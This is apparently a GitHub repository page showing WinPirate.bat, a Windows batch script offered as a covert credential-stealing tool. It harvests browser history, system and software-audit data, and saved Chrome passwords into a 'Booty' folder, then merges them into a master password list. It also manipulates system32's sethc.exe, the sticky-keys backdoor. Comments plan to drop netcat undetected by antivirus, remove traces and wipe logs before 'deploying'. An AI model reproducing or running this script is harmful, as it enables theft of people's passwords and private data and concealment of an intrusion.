-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathWinPirate.bat
51 lines (39 loc) · 1.44 KB
/
WinPirate.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
@echo off
REM stealthily grabs passwords and browser history from windows systems, and drops a netcat?? undetectable by antivirus
REM checking OS type
set TypeofOS=0
IF exist "%PROGRAMFILES(X86)%" (set TypeOfOS=64) ELSE (set TypeOfOS=32)
REM creating results directory
mkdir Booty
REM getting browser history
IF %TypeofOS% EQU 64 (GOTO Bhistory64) ELSE (GOTO Bhistory32)
:Bhistory32
"Tools\Browsinghistoryview\browsinghistoryview.exe" /scomma "Booty\browserhistory.csv"
GOTO WINAUDIT
:Bhistory64
"Tools\Browsinghistoryview\browsinghistoryview\browsinghistoryview64.exe" /scomma "Booty\browserhistory.csv"
GOTO WINAUDIT
REM get computer program information to see if vulnerable
:WINAUDIT
"Tools\winaudit\WinAudit.exe" /r=gsoPxuTUeERNtnzDaIbMpmidcSArCOHG /f="Booty\winaudit.html"
GOTO SYSTEMINFO
REM get system information
:SYSTEMINFO
systeminfo /FO CSV > "Booty\systeminfo.csv"
REM Chrome passwords
:CHROME
python chromepasswords.py -csv
REM Create master password list
type Booty\*.csv >> Booty\master_password_list.csv
REM add nc without being detected by antivirus
REM remove all traces of activity
REM wipe the logs
REM put sticky keys back to normal
takeown /f c:\windows\system32\sethc.exe
takeown /f c:\windows\system32\sethcold.exe
icacls c:\windows\system32\sethc.exe /grant %username%:F /q /t
icacls c:\windows\system32\sethc.exe /grant %username%:F /q /t
ren sethc.exe sethcbad.exe
ren sethcold.exe sethc.exe
pause
REM take out the pause before deploying